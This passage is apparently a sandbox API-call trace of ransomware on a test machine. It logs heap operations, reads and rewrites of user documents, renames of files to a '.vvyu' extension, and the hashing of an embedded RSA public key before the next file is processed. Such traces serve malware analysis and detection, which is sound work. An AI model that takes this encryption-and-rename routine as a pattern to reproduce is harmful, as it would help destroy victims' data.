hHeap=0x6a0000) returned 1 [0195.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0195.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a108 | out: hHeap=0x6a0000) returned 1 [0195.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f0d8 | out: hHeap=0x6a0000) returned 1 [0195.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.093] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xc020, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xc020, lpOverlapped=0x0) returned 1 [0195.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.094] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xc025, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.094] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.096] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.096] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.096] CloseHandle (hObject=0x52c) returned 1 [0195.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0195.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d2cc80 [0195.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0195.098] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\8NQv3A3M cCCF.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\8nqv3a3m cccf.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\8NQv3A3M cCCF.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\8nqv3a3m cccf.xls.vvyu")) returned 1 [0195.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.100] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0195.103] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d500210, ftCreationTime.dwHighDateTime=0x1d89a2f, ftLastAccessTime.dwLowDateTime=0xdc21fc10, ftLastAccessTime.dwHighDateTime=0x1d8a485, ftLastWriteTime.dwLowDateTime=0xdc21fc10, ftLastWriteTime.dwHighDateTime=0x1d8a485, nFileSizeHigh=0x0, nFileSizeLow=0x75fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rt8G.pptx", cAlternateFileName="RT8G~1.PPT")) returned 1 [0195.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0195.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.103] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\Rt8G.pptx") returned=".pptx" [0195.104] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\Rt8G.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\rt8g.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.104] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=30204) returned 1 [0195.104] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.107] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x75d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.107] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.109] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.109] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x75fc, lpOverlapped=0x0) returned 1 [0195.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.110] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0195.111] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.112] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.112] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.112] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.112] GetLastError () returned 0x0 [0195.112] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.112] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0195.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.112] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.112] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.112] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7600) returned 0x2d49778 [0195.113] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f0d8 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a108 [0195.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f120 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.114] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a120 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.117] GetCurrentThreadId () returned 0x264 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d467e0 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.118] GetCurrentThreadId () returned 0x264 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 